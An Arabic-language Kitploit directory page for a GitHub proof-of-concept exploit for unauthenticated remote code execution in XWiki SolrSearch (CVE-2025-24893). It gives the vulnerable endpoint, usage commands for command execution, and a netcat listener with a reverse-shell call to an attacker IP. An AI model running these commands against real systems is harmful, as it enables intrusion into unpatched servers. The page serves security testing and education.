Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
xwiki_solrsearch-rce-exploit — PoC لاستغلال RCE بدون مصادقة في XWiki SolrSearch (CVE-2025-24893). تنفيذ الأوامر + شل عكسي. | Kitploit
أدوات/GitHubGitHub/torjan0/xwiki_solrsearch-rce-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةالتعلم والتعليمتطوير الحمولات
GitHubtorjan0/xwiki_solrsearch-rce-exploit

xwiki_solrsearch-rce-exploit

PoC لاستغلال RCE بدون مصادقة في XWiki SolrSearch (CVE-2025-24893). تنفيذ الأوامر + شل عكسي.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

solrsearch-rce-exploit

إثبات مفهوم لتنفيذ التعليمات البرمجية عن بُعد (RCE) بدون مصادقة لـ XWiki SolrSearch (CVE-2025-24893). تنفيذ أوامر + صدفة عكسية.

CVE-2025-24893 – إثبات مفهوم RCE لـ XWiki SolrSearch

إثبات مفهوم لثغرة حقن القالب SolrSearch في XWiki والتي تؤدي إلى تنفيذ تعليمات برمجية عن بُعد بدون مصادقة.

تم اختباره ضد XWiki Debian 15.10.8 (تم إصلاحه في 15.10.11 / 16.4.1 / 16.5.0RC1).

⚠️ للاستخدام التعليمي فقط. لا تشغّل هذا ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

ماذا يفعل

  • يرسل حمولات Groovy مُصمَّمة خصيصًا عبر /xwiki/bin/get/Main/SolrSearch.
  • ينفّذ أوامر اعتباطية ويغلّف المخرجات بعلامات Base64 لفك ترميز نظيف.
  • يدعم تشغيل صدفة عكسية باستخدام مقابس Java.

المتطلبات

  • Python 3.x
  • ثبّت التبعيات باستخدام:
root@kitploit:~
pip install requests

الاستخدام

حدد المضيف الهدف (والمسار الاختياري) عند تشغيل السكربت.

نفّذ أوامر أساسية:

root@kitploit:~
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"

ابدأ صدفة عكسية:

root@kitploit:~
# On attacker box
nc -lvnp 4444

# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444

ملاحظات

  • نقطة النهاية: /xwiki/bin/get/Main/SolrSearch?media=rss&text=...
  • مخرجات Base64 النظيفة تضمن تحليلًا موثوقًا.
  • تم توضيحه في الأصل أثناء HTB Editor، لكنه ينطبق على مثيلات أخرى معرضة للخطر.
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
تنزيل الأداة